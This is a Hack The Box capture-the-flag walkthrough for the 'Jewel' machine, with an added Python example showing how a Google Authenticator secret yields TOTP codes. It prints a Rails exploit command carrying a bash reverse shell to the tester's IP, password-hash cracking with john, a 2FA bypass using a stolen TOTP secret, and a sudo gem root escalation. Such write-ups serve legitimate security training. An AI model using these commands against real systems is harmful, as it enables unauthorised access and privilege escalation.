Jewel ~ Hack The Box



Prerequisite


Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "10.10.10.211 jewel.htb" >> /etc/hosts

hosts file entry


Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

nmap -Pn -sC -sV -A -p- -oN initial jewel.htb

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was jewel.htb:8000/gitweb
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!

Scanning & Enumeration

Based on the scan that was run, I realized that port 8000 was running a web server. This was the web app that was being served!


Enumerating further revealed the app that was running and its version.

  • Rails 5.2.2.1

I was able to find an existing CVE for this version of rails and a POC.

Exploitation

With the help of the POC, I was able to gain a minimal shell on the remote box that was running rails 5.2.2.1.

First, I had to create an account on the blog which was running on port 8080.

Once I had that account created, I was ready to run the exploit.


┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
└─# python3 exploit.py 10.10.10.211 8080 nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"

User.txt flag

I was able to gain a stable shell to the user account.

Privilege Escalation

For this, I utilized Linpeas as I always do! The privesc script returned a password hash belonging to bill.


[+] Searching specific hashes inside files - less false positives (limit 70)
/home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

I headed off to crack the password with my trusty dictionary from seclists and good ol' john!

┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
└─# john password.hash -w=passwd.dict

Following that, I tried to run sudo -l to see which binaries could be run with sudo.

However, I was hit with a 2FA request which prevented me from running the command. After looking around for a bit, I realized that there was a .google_authenticator file in the home directory of bill.

bill@jewel:~$ cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH

I then activated the authenticator on my phone and was able to get it working!
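To show what that file actually encodes, here is an added example (my own code, not from the original write-up) implementing RFC 6238 TOTP over the file's base32 secret together with the WINDOW_SIZE semantics of google-authenticator-libpam; anyone who can read the file can produce the same codes the phone app does, which is why the file's permissions are the real control. It uses the RFC 6238 reference secret as constructed input rather than the secret from the box.

```python
import base64
import hashlib
import hmac
import struct

TIME_STEP = 30  # seconds per TOTP step, the default google-authenticator uses


def decode_secret(secret_b32: str) -> bytes:
    """Decode the unpadded base32 secret on the first line of ~/.google_authenticator."""
    secret_b32 = secret_b32.strip().upper()
    return base64.b32decode(secret_b32 + "=" * (-len(secret_b32) % 8))


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret_b32: str, unix_time: int, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter set to floor(unix_time / TIME_STEP)."""
    return hotp(decode_secret(secret_b32), unix_time // TIME_STEP, digits)


def accepted_codes(secret_b32: str, unix_time: int, window_size: int = 3) -> list:
    """Every code the PAM module accepts at unix_time for a given WINDOW_SIZE.

    WINDOW_SIZE is the number of concurrently valid codes centred on the current
    step: the default 3 is +/- 1 step, the file's 17 is +/- 8 steps, so a code
    from up to 4 minutes ago or 4 minutes ahead is still accepted.
    """
    key = decode_secret(secret_b32)
    now = unix_time // TIME_STEP
    half = (window_size - 1) // 2
    return [hotp(key, now + d) for d in range(-half, half + 1)]


# Constructed input: the RFC 6238 reference secret "12345678901234567890" in base32,
# chosen so the output can be checked against the RFC's published test vectors.
RFC_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"

if __name__ == "__main__":
    print(totp(RFC_SECRET, 59))                              # RFC vector at T=59 -> 287082
    print(len(accepted_codes(RFC_SECRET, 1234567890, 17)))   # 17 codes accepted at once
```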

And finally, I was able to run sudo -l using bill's account without any issues.

Now that I knew bill could run gem with sudo privileges, all there was left to do was head to GTFOBins and get root!

sudo gem open -e "/bin/sh -c /bin/sh" rdoc


rooty!